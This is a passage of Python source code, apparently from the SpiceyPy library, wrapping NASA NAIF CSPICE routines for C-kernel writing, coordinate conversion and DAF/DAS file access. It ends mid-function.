@spiceErrorCheck
def ckupf(handle):
"""
Unload a CK pointing file so that it will no longer be searched
by the readers.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckupf_c.html
:param handle: Handle of CK file to be unloaded
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.ckupf_c(handle)
@spiceErrorCheck
def ckw01(handle, begtim, endtim, inst, ref, avflag, segid, nrec, sclkdp, quats,
avvs):
"""
Add a type 1 segment to a C-kernel.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw01_c.html
:param handle: Handle of an open CK file.
:type handle: int
:param begtim: The beginning encoded SCLK of the segment.
:type begtim: float
:param endtim: The ending encoded SCLK of the segment.
:type endtim: float
:param inst: The NAIF instrument ID code.
:type inst: int
:param ref: The reference frame of the segment.
:type ref: str
:param avflag: True if the segment will contain angular velocity.
:type avflag: bool
:param segid: Segment identifier.
:type segid: str
:param nrec: Number of pointing records.
:type nrec: int
:param sclkdp: Encoded SCLK times.
:type sclkdp: Array of floats
:param quats: Quaternions representing instrument pointing.
:type quats: Nx4-Element Array of floats
:param avvs: Angular velocity vectors.
:type avvs: Nx3-Element Array of floats
"""
handle = ctypes.c_int(handle)
begtim = ctypes.c_double(begtim)
endtim = ctypes.c_double(endtim)
inst = ctypes.c_int(inst)
ref = stypes.stringToCharP(ref)
avflag = ctypes.c_int(avflag)
segid = stypes.stringToCharP(segid)
sclkdp = stypes.toDoubleVector(sclkdp)
quats = stypes.toDoubleMatrix(quats)
avvs = stypes.toDoubleMatrix(avvs)
nrec = ctypes.c_int(nrec)
libspice.ckw01_c(handle, begtim, endtim, inst, ref, avflag, segid, nrec,
sclkdp, quats, avvs)
@spiceErrorCheck
def ckw02(handle, begtim, endtim, inst, ref, segid, nrec, start, stop, quats,
avvs, rates):
"""
Write a type 2 segment to a C-kernel.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw02_c.html
:param handle: Handle of an open CK file.
:type handle: int
:param begtim: The beginning encoded SCLK of the segment.
:type begtim: float
:param endtim: The ending encoded SCLK of the segment.
:type endtim: float
:param inst: The NAIF instrument ID code.
:type inst: int
:param ref: The reference frame of the segment.
:type ref: str
:param segid: Segment identifier.
:type segid: str
:param nrec: Number of pointing records.
:type nrec: int
:param start: Encoded SCLK interval start times.
:type start: Array of floats
:param stop: Encoded SCLK interval stop times.
:type stop: Array of floats
:param quats: Quaternions representing instrument pointing.
:type quats: Nx4-Element Array of floats
:param avvs: Angular velocity vectors.
:type avvs: Nx3-Element Array of floats
:param rates: Number of seconds per tick for each interval.
:type rates: Array of floats
"""
handle = ctypes.c_int(handle)
begtim = ctypes.c_double(begtim)
endtim = ctypes.c_double(endtim)
inst = ctypes.c_int(inst)
ref = stypes.stringToCharP(ref)
segid = stypes.stringToCharP(segid)
start = stypes.toDoubleVector(start)
stop = stypes.toDoubleVector(stop)
rates = stypes.toDoubleVector(rates)
quats = stypes.toDoubleMatrix(quats)
avvs = stypes.toDoubleMatrix(avvs)
nrec = ctypes.c_int(nrec)
libspice.ckw02_c(handle, begtim, endtim, inst, ref, segid, nrec, start,
stop, quats, avvs, rates)
@spiceErrorCheck
def ckw03(handle, begtim, endtim, inst, ref, avflag, segid, nrec, sclkdp, quats,
avvs, nints, starts):
"""
Add a type 3 segment to a C-kernel.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw03_c.html
:param handle: Handle of an open CK file.
:type handle: int
:param begtim: The beginning encoded SCLK of the segment.
:type begtim: float
:param endtim: The ending encoded SCLK of the segment.
:type endtim: float
:param inst: The NAIF instrument ID code.
:type inst: int
:param ref: The reference frame of the segment.
:type ref: str
:param avflag: True if the segment will contain angular velocity.
:type avflag: bool
:param segid: Segment identifier.
:type segid: str
:param nrec: Number of pointing records.
:type nrec: int
:param sclkdp: Encoded SCLK times.
:type sclkdp: Array of floats
:param quats: Quaternions representing instrument pointing.
:type quats: Nx4-Element Array of floats
:param avvs: Angular velocity vectors.
:type avvs: Nx3-Element Array of floats
:param nints: Number of intervals.
:type nints: int
:param starts: Encoded SCLK interval start times.
:type starts: Array of floats
"""
handle = ctypes.c_int(handle)
begtim = ctypes.c_double(begtim)
endtim = ctypes.c_double(endtim)
inst = ctypes.c_int(inst)
ref = stypes.stringToCharP(ref)
avflag = ctypes.c_int(avflag)
segid = stypes.stringToCharP(segid)
sclkdp = stypes.toDoubleVector(sclkdp)
quats = stypes.toDoubleMatrix(quats)
avvs = stypes.toDoubleMatrix(avvs)
nrec = ctypes.c_int(nrec)
starts = stypes.toDoubleVector(starts)
nints = ctypes.c_int(nints)
libspice.ckw03_c(handle, begtim, endtim, inst, ref, avflag, segid, nrec,
sclkdp, quats, avvs, nints, starts)
@spiceErrorCheck
def ckw05(handle, subtype, degree, begtim, endtim, inst, ref, avflag, segid,
sclkdp, packts, rate, nints, starts):
"""
Write a type 5 segment to a CK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw05_c.html
:param handle: Handle of an open CK file.
:type handle: int
:param subtype: CK type 5 subtype code. Can be: 0, 1, 2, 3 see naif docs via link above.
:type subtype: int
:param degree: Degree of interpolating polynomials.
:type degree: int
:param begtim: The beginning encoded SCLK of the segment.
:type begtim: float
:param endtim: The ending encoded SCLK of the segment.
:type endtim: float
:param inst: The NAIF instrument ID code.
:type inst: int
:param ref: The reference frame of the segment.
:type ref: str
:param avflag: True if the segment will contain angular velocity.
:type avflag: bool
:param segid: Segment identifier.
:type segid: str
:param sclkdp: Encoded SCLK times.
:type sclkdp: Array of floats
:param packts: Array of packets.
:type packts: Some NxM vector of floats
:param rate: Nominal SCLK rate in seconds per tick.
:type rate: float
:param nints: Number of intervals.
:type nints: int
:param starts: Encoded SCLK interval start times.
:type starts: Array of floats
"""
handle = ctypes.c_int(handle)
subtype = ctypes.c_int(subtype)
degree = ctypes.c_int(degree)
begtim = ctypes.c_double(begtim)
endtim = ctypes.c_double(endtim)
inst = ctypes.c_int(inst)
ref = stypes.stringToCharP(ref)
avflag = ctypes.c_int(avflag)
segid = stypes.stringToCharP(segid)
n = ctypes.c_int(len(packts))
sclkdp = stypes.toDoubleVector(sclkdp)
packts = stypes.toDoubleMatrix(packts)
rate = ctypes.c_double(rate)
nints = ctypes.c_int(nints)
starts = stypes.toDoubleVector(starts)
libspice.ckw05_c(handle, subtype, degree, begtim, endtim, inst, ref, avflag,
segid, n, sclkdp, packts, rate, nints, starts)
def cleard():
raise NotImplementedError
@spiceErrorCheck
def clight():
"""
Return the speed of light in a vacuum (IAU official value, in km/sec).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/clight_c.html
:return: The function returns the speed of light in vacuum (km/sec).
:rtype: float
"""
return libspice.clight_c()
@spiceErrorCheck
def clpool():
"""
Remove all variables from the kernel pool. Watches
on kernel variables are retained.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/clpool_c.html
"""
libspice.clpool_c()
@spiceErrorCheck
def cltext(fname):
"""
Internal undocumented command for closing a text file opened by RDTEXT.
No URL available; relevant lines from SPICE source:
FORTRAN SPICE, rdtext.f::
C$Procedure CLTEXT ( Close a text file opened by RDTEXT)
ENTRY CLTEXT ( FILE )
CHARACTER*(*) FILE
C VARIABLE I/O DESCRIPTION
C -------- --- --------------------------------------------------
C FILE I Text file to be closed.
CSPICE, rdtext.c::
/* $Procedure CLTEXT ( Close a text file opened by RDTEXT) */
/* Subroutine */ int cltext_(char *file, ftnlen file_len)
:param fname: Text file to be closed.
:type fname: str
"""
fnameP = stypes.stringToCharP(fname)
fname_len = ctypes.c_int(len(fname))
libspice.cltext_(fnameP, fname_len)
@spiceErrorCheck
def cmprss(delim, n, instr, lenout=_default_len_out):
"""
Compress a character string by removing occurrences of
more than N consecutive occurrences of a specified
character.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cmprss_c.html
:param delim: Delimiter to be compressed.
:type delim: str
:param n: Maximum consecutive occurrences of delim.
:type n: int
:param instr: Input string.
:type instr: str
:param lenout: Optional available space in output string.
:type lenout: Optional int
:return: Compressed string.
:rtype: str
"""
delim = ctypes.c_char(delim.encode(encoding='UTF-8'))
n = ctypes.c_int(n)
instr = stypes.stringToCharP(instr)
output = stypes.stringToCharP(lenout)
libspice.cmprss_c(delim, n, instr, lenout, output)
return stypes.toPythonString(output)
@spiceErrorCheck
@spiceFoundExceptionThrower
def cnmfrm(cname, lenout=_default_len_out):
"""
Retrieve frame ID code and name to associate with an object.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cnmfrm_c.html
:param cname: Name of the object to find a frame for.
:type cname: int
:param lenout: Maximum length available for frame name.
:type lenout: int
:return:
The ID code of the frame associated with cname,
The name of the frame with ID frcode.
:rtype: tuple
"""
lenout = ctypes.c_int(lenout)
frname = stypes.stringToCharP(lenout)
cname = stypes.stringToCharP(cname)
found = ctypes.c_int()
frcode = ctypes.c_int()
libspice.cnmfrm_c(cname, lenout, ctypes.byref(frcode), frname,
ctypes.byref(found))
return frcode.value, stypes.toPythonString(frname), bool(found.value)
@spiceErrorCheck
def conics(elts, et):
"""
Determine the state (position, velocity) of an orbiting body
from a set of elliptic, hyperbolic, or parabolic orbital
elements.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/conics_c.html
:param elts: Conic elements.
:type elts: 8-Element Array of floats
:param et: Input time.
:type et: float
:return: State of orbiting body at et.
:rtype: 6-Element Array of floats
"""
elts = stypes.toDoubleVector(elts)
et = ctypes.c_double(et)
state = stypes.emptyDoubleVector(6)
libspice.conics_c(elts, et, state)
return stypes.cVectorToPython(state)
@spiceErrorCheck
def convrt(x, inunit, outunit):
"""
Take a measurement X, the units associated with
X, and units to which X should be converted; return Y
the value of the measurement in the output units.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/convrt_c.html
:param x: Number representing a measurement in some units.
:type x: float
:param inunit: The units in which x is measured.
:type inunit: str
:param outunit: Desired units for the measurement.
:type outunit: str
:return: The measurment in the desired units.
:rtype: float
"""
x = ctypes.c_double(x)
inunit = stypes.stringToCharP(inunit)
outunit = stypes.stringToCharP(outunit)
y = ctypes.c_double()
libspice.convrt_c(x, inunit, outunit, ctypes.byref(y))
return y.value
@spiceErrorCheck
def copy(cell):
"""
Copy the contents of a SpiceCell of any data type to another
cell of the same type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/copy_c.html
:param cell: Cell to be copied.
:type cell: spiceypy.utils.support_types.SpiceCell
:return: New cell
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cell, stypes.SpiceCell)
# Next line was redundant with [raise NotImpImplementedError] below
# assert cell.dtype == 0 or cell.dtype == 1 or cell.dtype == 2
if cell.dtype is 0:
newcopy = stypes.SPICECHAR_CELL(cell.size, cell.length)
elif cell.dtype is 1:
newcopy = stypes.SPICEDOUBLE_CELL(cell.size)
elif cell.dtype is 2:
newcopy = stypes.SPICEINT_CELL(cell.size)
else:
raise NotImplementedError
libspice.copy_c(ctypes.byref(cell), ctypes.byref(newcopy))
return newcopy
@spiceErrorCheck
def cpos(string, chars, start):
"""
Find the first occurrence in a string of a character belonging
to a collection of characters, starting at a specified location,
searching forward.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cpos_c.html
:param string: Any character string.
:type string: str
:param chars: A collection of characters.
:type chars: str
:param start: Position to begin looking for one of chars.
:type start: int
:return:
The index of the first character of str at or
following index start that is in the collection chars.
:rtype: int
"""
string = stypes.stringToCharP(string)
chars = stypes.stringToCharP(chars)
start = ctypes.c_int(start)
return libspice.cpos_c(string, chars, start)
@spiceErrorCheck
def cposr(string, chars, start):
"""
Find the first occurrence in a string of a character belonging
to a collection of characters, starting at a specified location,
searching in reverse.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cposr_c.html
:param string: Any character string.
:type string: str
:param chars: A collection of characters.
:type chars: str
:param start: Position to begin looking for one of chars.
:type start: int
:return:
The index of the last character of str at or
before index start that is in the collection chars.
:rtype: int
"""
string = stypes.stringToCharP(string)
chars = stypes.stringToCharP(chars)
start = ctypes.c_int(start)
return libspice.cposr_c(string, chars, start)
@spiceErrorCheck
def cvpool(agent):
"""
Indicate whether or not any watched kernel variables that have a
specified agent on their notification list have been updated.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cvpool_c.html
:param agent: Name of the agent to check for notices.
:type agent: str
:return: True if variables for "agent" have been updated.
:rtype: bool
"""
agent = stypes.stringToCharP(agent)
update = ctypes.c_int()
libspice.cvpool_c(agent, ctypes.byref(update))
return bool(update.value)
@spiceErrorCheck
def cyllat(r, lonc, z):
"""
Convert from cylindrical to latitudinal coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cyllat_c.html
:param r: Distance of point from z axis.
:type r: float
:param lonc: Cylindrical angle of point from XZ plane(radians).
:type lonc: float
:param z: Height of point above XY plane.
:type z: float
:return: Distance, Longitude (radians), and Latitude of point (radians).
:rtype: tuple
"""
r = ctypes.c_double(r)
lonc = ctypes.c_double(lonc)
z = ctypes.c_double(z)
radius = ctypes.c_double()
lon = ctypes.c_double()
lat = ctypes.c_double()
libspice.cyllat_c(r, lonc, z, ctypes.byref(radius), ctypes.byref(lon),
ctypes.byref(lat))
return radius.value, lon.value, lat.value
@spiceErrorCheck
def cylrec(r, lon, z):
"""
Convert from cylindrical to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cylrec_c.html
:param r: Distance of a point from z axis.
:type r: float
:param lon: Angle (radians) of a point from xZ plane.
:type lon: float
:param z: Height of a point above xY plane.
:type z: float
:return: Rectangular coordinates of the point.
:rtype: 3-Element Array of floats
"""
r = ctypes.c_double(r)
lon = ctypes.c_double(lon)
z = ctypes.c_double(z)
rectan = stypes.emptyDoubleVector(3)
libspice.cylrec_c(r, lon, z, rectan)
return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def cylsph(r, lonc, z):
"""
Convert from cylindrical to spherical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cylsph_c.html
:param r: Rectangular coordinates of the point.
:type r: float
:param lonc: Angle (radians) of point from XZ plane.
:type lonc: float
:param z: Height of point above XY plane.
:type z: float
:return:
Distance of point from origin,
Polar angle (co-latitude in radians) of point,
Azimuthal angle (longitude) of point (radians).
:rtype: tuple
"""
r = ctypes.c_double(r)
lonc = ctypes.c_double(lonc)
z = ctypes.c_double(z)
radius = ctypes.c_double()
colat = ctypes.c_double()
lon = ctypes.c_double()
libspice.cyllat_c(r, lonc, z, ctypes.byref(radius), ctypes.byref(colat),
ctypes.byref(lon))
return radius.value, colat.value, lon.value
################################################################################
# D
@spiceErrorCheck
def dafac(handle, buffer):
"""
Add comments from a buffer of character strings to the comment
area of a binary DAF file, appending them to any comments which
are already present in the file's comment area.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafac_c.html
:param handle: handle of a DAF opened with write access.
:type handle: int
:param buffer: Buffer of comments to put into the comment area.
:type buffer: list[str]
"""
handle = ctypes.c_int(handle)
lenvals = ctypes.c_int(len(max(buffer, key=len)) + 1)
n = ctypes.c_int(len(buffer))
buffer = stypes.listToCharArrayPtr(buffer)
libspice.dafac_c(handle, n, lenvals, buffer)
@spiceErrorCheck
def dafbbs(handle):
"""
Begin a backward search for arrays in a DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafbbs_c.html
:param handle: Handle of DAF to be searched.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dafbbs_c(handle)
@spiceErrorCheck
def dafbfs(handle):
"""
Begin a forward search for arrays in a DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafbfs_c.html
:param handle: Handle of file to be searched.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dafbfs_c(handle)
@spiceErrorCheck
def dafcls(handle):
"""
Close the DAF associated with a given handle.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafcls_c.html
:param handle: Handle of DAF to be closed.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dafcls_c(handle)
@spiceErrorCheck
def dafcs(handle):
"""
Select a DAF that already has a search in progress as the
one to continue searching.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafcs_c.html
:param handle: Handle of DAF to continue searching.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dafcs_c(handle)
@spiceErrorCheck
def dafdc(handle):
"""
Delete the entire comment area of a specified DAF file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafdc_c.html
:param handle: The handle of a binary DAF opened for writing.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dafdc_c(handle)
@spiceErrorCheck
def dafec(handle, bufsiz, lenout=_default_len_out):
"""
Extract comments from the comment area of a binary DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafec_c.html
:param handle: Handle of binary DAF opened with read access.
:type handle: int
:param bufsiz: Maximum size, in lines, of buffer.
:type bufsiz: int
:param lenout: Length of strings in output buffer.
:type lenout: int
:return:
Number of extracted comment lines,
buffer where extracted comment lines are placed,
Indicates whether all comments have been extracted.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
buffer = stypes.emptyCharArray(yLen=bufsiz, xLen=lenout)
bufsiz = ctypes.c_int(bufsiz)
lenout = ctypes.c_int(lenout)
n = ctypes.c_int()
done = ctypes.c_int()
libspice.dafec_c(handle, bufsiz, lenout, ctypes.byref(n),
ctypes.byref(buffer), ctypes.byref(done))
return n.value, stypes.cVectorToPython(buffer), bool(done.value)
@spiceErrorCheck
def daffna():
"""
Find the next (forward) array in the current DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/daffna_c.html
:return: True if an array was found.
:rtype: bool
"""
found = ctypes.c_int()
libspice.daffna_c(ctypes.byref(found))
return bool(found.value)
@spiceErrorCheck
def daffpa():
"""
Find the previous (backward) array in the current DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/daffpa_c.html
:return: True if an array was found.
:rtype: bool
"""
found = ctypes.c_int()
libspice.daffpa_c(ctypes.byref(found))
return bool(found.value)
@spiceErrorCheck
def dafgda(handle, begin, end):
"""
Read the double precision data bounded by two addresses within a DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgda_c.html
:param handle: Handle of a DAF.
:type handle: int
:param begin: Initial address within file.
:type begin: int
:param end: Final address within file.
:type end: int
:return: Data contained between begin and end.
:rtype: Array of floats
"""
handle = ctypes.c_int(handle)
data = stypes.emptyDoubleVector(abs(end - begin))
begin = ctypes.c_int(begin)
end = ctypes.c_int(end)
libspice.dafgda_c(handle, begin, end, data)
return stypes.cVectorToPython(data)
@spiceErrorCheck
def dafgh():
"""
Return (get) the handle of the DAF currently being searched.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgh_c.html
:return: Handle for current DAF.
:rtype: int
"""
outvalue = ctypes.c_int()
libspice.dafgh_c(ctypes.byref(outvalue))
return outvalue.value
@spiceErrorCheck
def dafgn(lenout=_default_len_out):
"""
Return (get) the name for the current array in the current DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgn_c.html
:param lenout: Length of array name string.
:type lenout: int
:return: Name of current array.
:rtype: str
"""
lenout = ctypes.c_int(lenout)
name = stypes.stringToCharP(lenout)
libspice.dafgn_c(lenout, name)
return stypes.toPythonString(name)
@spiceErrorCheck
def dafgs(n=125):
# The 125 may be a hard set,
# I got strange errors that occasionally happened without it
"""
Return (get) the summary for the current array in the current DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgs_c.html
:param n: Optional length N for result Array.
:return: Summary for current array.
:rtype: Array of floats
"""
retarray = stypes.emptyDoubleVector(125)
# libspice.dafgs_c(ctypes.cast(retarray, ctypes.POINTER(ctypes.c_double)))
libspice.dafgs_c(retarray)
return stypes.cVectorToPython(retarray)[0:n]
@spiceErrorCheck
@spiceFoundExceptionThrower
def dafgsr(handle, recno, begin, end):
"""
Read a portion of the contents of (words in) a summary record in a DAF file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgsr_c.html
:param handle: Handle of DAF.
:type handle: int
:param recno: Record number; word indices are 1-based, 1 to 128 inclusive.
:type recno: int
:param begin: Index of first word to read from record, will be clamped > 0.
:type begin: int
:param end: Index of last word to read, wll be clamped < 129
:type end: int
:return: Contents of request sub-record
:rtype: float numpy.ndarray
"""
handle = ctypes.c_int(handle)
recno = ctypes.c_int(recno)
begin = ctypes.c_int(begin)
end = ctypes.c_int(end)
# dafgsr_c will retrieve no more than 128 words
data = stypes.emptyDoubleVector(1 + min([128,end.value]) - max([begin.value,1]))
found = ctypes.c_int()
libspice.dafgsr_c(handle, recno, begin, end, data, ctypes.byref(found))
return stypes.cVectorToPython(data), bool(found.value)
@spiceErrorCheck
def dafopr(fname):
"""
Open a DAF for subsequent read requests.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafopr_c.html
:param fname: Name of DAF to be opened.
:type fname: str
:return: Handle assigned to DAF.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int()
libspice.dafopr_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def dafopw(fname):
"""
Open a DAF for subsequent write requests.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafopw_c.html
:param fname: Name of DAF to be opened.
:type fname: str
:return: Handle assigned to DAF.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int()
libspice.dafopw_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def dafps(nd, ni, dc, ic):
"""
Pack (assemble) an array summary from its double precision and
integer components.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafps_c.html
:param nd: Number of double precision components.
:type nd: int
:param ni: Number of integer components.
:type ni: int
:param dc: Double precision components.
:type dc: Array of floats
:param ic: Integer components.
:type ic: Array of ints
:return: Array summary.
:rtype: Array of floats
"""
dc = stypes.toDoubleVector(dc)
ic = stypes.toIntVector(ic)
outsum = stypes.emptyDoubleVector(nd + ni)
nd = ctypes.c_int(nd)
ni = ctypes.c_int(ni)
libspice.dafps_c(nd, ni, dc, ic, outsum)
return stypes.cVectorToPython(outsum)
@spiceErrorCheck
def dafrda(handle, begin, end):
"""
Read the double precision data bounded by two addresses within a DAF.
Deprecated: This routine has been superseded by :func:`dafgda` and
:func:`dafgsr`. This routine is supported for purposes of backward
compatibility only.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafrda_c.html
:param handle: Handle of a DAF.
:type handle: int
:param begin: Initial address within file.
:type begin: int
:param end: Final address within file.
:type end: int
:return: Data contained between begin and end.
:rtype: Array of floats
"""
handle = ctypes.c_int(handle)
begin = ctypes.c_int(begin)
end = ctypes.c_int(end)
data = stypes.emptyDoubleVector(1 + end.value - begin.value)
libspice.dafrda_c(handle, begin, end, data)
return stypes.cVectorToPython(data)
@spiceErrorCheck
def dafrfr(handle, lenout=_default_len_out):
"""
Read the contents of the file record of a DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafrfr_c.html
:param handle: Handle of an open DAF file.
:type handle: int
:param lenout: Available room in the output string
:type lenout: int
:return:
Number of double precision components in summaries,
Number of integer components in summaries,
Internal file name, Forward list pointer,
Backward list pointer, Free address pointer.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
lenout = ctypes.c_int(lenout)
nd = ctypes.c_int()
ni = ctypes.c_int()
ifname = stypes.stringToCharP(lenout)
fward = ctypes.c_int()
bward = ctypes.c_int()
free = ctypes.c_int()
libspice.dafrfr_c(handle, lenout, ctypes.byref(nd), ctypes.byref(ni),
ifname, ctypes.byref(fward), ctypes.byref(bward),
ctypes.byref(free))
return nd.value, ni.value, stypes.toPythonString(
ifname), fward.value, bward.value, free.value
@spiceErrorCheck
def dafrs(insum):
"""
Change the summary for the current array in the current DAF.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafrs_c.html
:param insum: New summary for current array.
:type insum: Array of floats
"""
insum = stypes.toDoubleVector(insum)
libspice.dafrs_c(ctypes.byref(insum))
@spiceErrorCheck
def dafus(insum, nd, ni):
"""
Unpack an array summary into its double precision and integer components.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafus_c.html
:param insum: Array summary.
:type insum: Array of floats
:param nd: Number of double precision components.
:type nd: int
:param ni: Number of integer components.
:type ni: int
:return: Double precision components, Integer components.
:rtype: tuple
"""
insum = stypes.toDoubleVector(insum)
dc = stypes.emptyDoubleVector(nd)
ic = stypes.emptyIntVector(ni)
nd = ctypes.c_int(nd)
ni = ctypes.c_int(ni)
libspice.dafus_c(insum, nd, ni, dc, ic)
return stypes.cVectorToPython(dc), stypes.cVectorToPython(ic)
@spiceErrorCheck
def dasac(handle, buffer):
"""
Add comments from a buffer of character strings to the comment
area of a binary DAS file, appending them to any comments which
are already present in the file's comment area.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasac_c.html
:param handle: DAS handle of a file opened with write access.
:type handle: int
:param buffer: Buffer of lines to be put into the comment area.
:type buffer: Array of strs
"""
handle = ctypes.c_int(handle)
n = ctypes.c_int(len(buffer))
buflen = ctypes.c_int(max(len(s) for s in buffer) + 1)
buffer = stypes.listToCharArrayPtr(buffer)
libspice.dasac_c(handle, n, buflen, buffer)
@spiceErrorCheck
def dascls(handle):
"""
Close a DAS file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dascls_c.html
:param handle: Handle of an open DAS file.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dascls_c(handle)
@spiceErrorCheck
def dasdc(handle):
"""
Delete the entire comment area of a previously opened binary
DAS file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasdc_c.html
:param handle: The handle of a binary DAS file opened for writing.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.dasdc_c(handle)
@spiceErrorCheck
def dasec(handle, bufsiz=_default_len_out, buflen=_default_len_out):
"""
Extract comments from the comment area of a binary DAS file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasec_c.html
:param handle: Handle of binary DAS file open with read access.
:type handle: int
:param bufsiz: Maximum size, in lines, of buffer.
:type bufsiz: int
:param buflen: Line length associated with buffer.
:type buflen: int
:return:
Number of comments extracted from the DAS file,
Buffer in which extracted comments are placed,
Indicates whether all comments have been extracted.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
buffer = stypes.emptyCharArray(buflen, bufsiz)
bufsiz = ctypes.c_int(bufsiz)
buflen = ctypes.c_int(buflen)
n = ctypes.c_int(0)
done = ctypes.c_int()
libspice.dasec_c(handle, bufsiz, buflen, ctypes.byref(n),
ctypes.byref(buffer), ctypes.byref(done))
return n.value, stypes.cVectorToPython(buffer), done.value
@spiceErrorCheck
def dashfn(handle, lenout=_default_len_out):
"""
Return the name of the DAS file associated with a handle.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dashfn_c.html
:param handle: Handle of a DAS file.
:type handle: int
:param lenout: Length of output file name string.
:type lenout: int
:return: Corresponding file name.
:rtype: str
"""
handle = ctypes.c_int(handle)
namlen = ctypes.c_int(lenout)
fname = stypes.stringToCharP(lenout)
libspice.dashfn_c(handle, namlen, fname)
return stypes.toPythonString(fname)
@spiceErrorCheck
def dasonw(fname, ftype, ifname, ncomch):
"""
Internal undocumented command for creating a new DAS file
:param fname: filename
:type fname: str
:param ftype: type
:type ftype: str
:param ifname: internal file name
:type ifname: str
:param ncomch: amount of comment area
:type ncomch: int
:return: Handle to new DAS file
:rtype: int
"""
fnamelen = ctypes.c_int(len(fname))
ftypelen = ctypes.c_int(len(ftype))
ifnamelen = ctypes.c_int(len(ifname))
ncomch = ctypes.c_int(ncomch)
handle = ctypes.c_int()
fname = stypes.stringToCharP(fname)
ftype = stypes.stringToCharP(ftype)
ifname = stypes.stringToCharP(ifname)
libspice.dasonw_(fname, ftype, ifname, ctypes.byref(ncomch), ctypes.byref(handle), fnamelen, ftypelen, ifnamelen)
return handle.value
@spiceErrorCheck
def dasopr(fname):
"""
Open a DAS file for reading.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasopr_c.html
:param fname: Name of a DAS file to be opened.
:type fname: str
:return: Handle assigned to the opened DAS file.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int()
libspice.dasopr_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def dasopw(fname):
"""
Open a DAS file for writing.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasopw_c.html
:param fname: Name of a DAS file to be opened.
:type fname: str
:return: Handle assigned to the opened DAS file.
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int(0)
libspice.dasopw_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def dasrfr(handle, lenout=_default_len_out):
"""
Return the contents of the file record of a specified DAS file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasrfr_c.html
:param handle: DAS file handle.
:type handle: int
:param lenout: length of output strs
:type lenout: str
:return: ID word, DAS internal file name, Number of reserved records in file, \
Number of characters in use in reserved rec. area, Number of comment records in file, \
Number of characters in use in comment area.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
